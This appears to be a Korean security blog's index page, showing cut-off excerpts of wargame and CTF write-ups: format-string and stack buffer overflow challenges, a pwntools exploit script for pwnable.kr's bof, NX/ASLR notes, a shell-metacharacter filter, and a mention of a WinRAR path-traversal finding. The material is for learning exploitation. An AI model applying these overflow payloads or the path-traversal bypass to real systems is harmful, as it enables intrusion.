2024.03.20

#include #include int main(int argc, char *argv[]){ FILE *secret = fopen("/challenge/app-systeme/ch5/.passwd", "rt"); char buffer[32]; fgets(buffer, sizeof(buffer), secret); printf(argv[1]); fclose(secret); return 0;} payload%08x(뛰어쓰기) 한 이유는 보기 좋게 하기 위해서 출력된 값을 복사 해서 chatgpt한테 역순으로 바꿔달라 했다. 그리고 ascii 문자를 확인을 하면 된다

#include #include #include #include #define DEFAULT_LEN 16 void admin_shell(void){ system("C:\\Windows\\system32\\cmd.exe");} int main(void){ char buff[DEFAULT_LEN] = {0}; gets(buff); for (int i = 0; i 서버에 존재하는 pe파일을 옮겨서 ida로 실행한다.이게 admin_shell 함수의 주소이다.버퍼ebp-14h payload = 'a' * 0x14 + 'b' * 0x4 + 00401000(당연히 리틀엔디안으로 넣고)

scp -P [포트번호] [유저이름]@[서버 주소]:[서버에 위치한 파일] ./ PE 파일 같은 경우에는 받아가지고 windbg 돌려봐야해서 필수임

화이트햇 스쿨 3기 프로젝트 하면서 winrar 취약점을 발견하게 되어서 어떻게 찾게 되었고, 분석은 어떻게 했는지에 대한 글입니다.제 글이 이 글을 읽는 여러분에게도 도움이 되었으면 좋겠습니다. 취약점을 발견한 방법A 프로그램에서 path traversal 우회 했던 방법을 가지고, 압축 프로그램 테스트를 하다가 운이 좋게 발견을 했습니다.(그때 새벽이 였는데, 10시간 투자해서 명예와 돈을 가지게 되었네요. 심지어 다른 압축 프로그램에서 되는 것도 있고)그래서, A 프로그램에서 취약점을 발견한 방법이 곧 취약점을 발견한 방법이 되겠습니다A 프로그램에서는 .. 만 필터링 하고, ..(공백)을 넣으면 우회를 할 수 있지 않을까? 하는 단순한 생각으로 접근을 했습니다.하지만 A 프로그램은 압축 프로그램..

소스코드스택은 낮은 주소에서 높은 주소로 overflow가 가능하다. 풀이key는 ebp+0x8에 위치한다.overflowme는 ebp-0xc에 위치한다.2c + 8 = 0x34from pwn import *r = ssh(host="pwnable.kr", user="bof", password="guest", port=2222)p = r.run("/bin/sh")p.sendline("nc 0 9000")key = 0xcafebabepayload = b'A' * 52 + p32(key)p.sendline(payload)p.interactive()readme 확인을 안해서 쉘을 따도 플래그가 안보여서 다른 분이 쓴 write-up 참고함

문제md5 해시 충돌에 대한 문제인 것 같다소스 코드.int* 로 4바이트 단위로 접근을 한다. 4바이트씩 총 5개 -> 20바이트로 구성된 입력을 요구한다.20바이트 입력을 4바이트씩 나눠서 총 5개의 정수를 더한 값이 res가 된다. 4byte * 5 = 0x21DD09EC가 되어야함0x21DD09EC / 5 = 0x6C5CEC86C5CEC8 * 5 = 0x21DD09E8 4바이트가 차이난다. 0x6c5cec8 * 4 + 0x6c5cecc

NX프로레스 명령어나 코드 또는 데이터 저장을 위한 메모리 영역을 따로 분리하는 CPU의 기술NX 특성으로 지정된 모든 메모리 구역은 데이터 저장을 위해서만 사용되고, 프로세서 명령어가 그 곳에 상주하지 않음으로써 실행되지 않도록 만들어 준다ex) 공격자가 Heap, Stack 영역에 shellcode를 저장해서 실행하기 위해서는 해당 영역에 실행권한이 있어야한다.NX 비활성화 옵션 : gcc -z execstack ASLRASLR(Address Space Layout Randomization)스택, 힙, 라이브러리, 등의 주소를 랜덤한 영역에 배치하여, 공격에 필요한 target address를 예측하기 어렵게 만든다.프로그램이 실행 될 때마다 각 주소들이 변경이 된다.echo 0 > /proc/sys..

처음 이세계에 가면 슬라임을 잡듯이 여기도 슬라임이 맨 처음 문제이다.저는 wsl을 사용을 하기 때문에, ssh fd@pwnable.kr -p2222 접속을 하고 시작하면 되겠습니다.ls 명령어를 통해서, 현재 디렉토리에서 파일이 어떤 것이 있는지 확인을 합니다.fd , fd.c , flag 파일이 있습니다. 어차피 cat flag 해도 flag는 출력이 안될것 같으니, 바로 소스코드를 확인을 했습니다.system("/bin/cat flag"); 를 실행을 하도록 해당 조건문으로 진입을 하게 하면 될 것 같습니다.여기서 이 코드들이 핵심입니다.int fd = atoi( argv[1] ) - 0x1234;int len = 0;len = read(fd, buf, 32);if(!strcmp("LETMEWIN\..

#include #include #include #include void shell() { setreuid(geteuid(), geteuid()); system("/bin/bash");} void sup() { printf("Hey dude ! Waaaaazzaaaaaaaa ?!\n");} void main(){ int var; void (*func)()=sup; char buf[128]; fgets(buf,133,stdin); func();}p 명령어는 print의 약자로 변수/주소 등을 출력한다.최종

#include #include #include #include void checkArg(const char *a){ while (*a) { if ( (*a == ';') || (*a == '&') || (*a == '|') || (*a == ',') || (*a == '$') || (*a == '(') || (*a == ')') || (*a == '{') || (*a == '}') || (*a == '`') || (*a == '>') || (*a == 'gets 함수를 통해서 힙 오버플로우가 발생한다...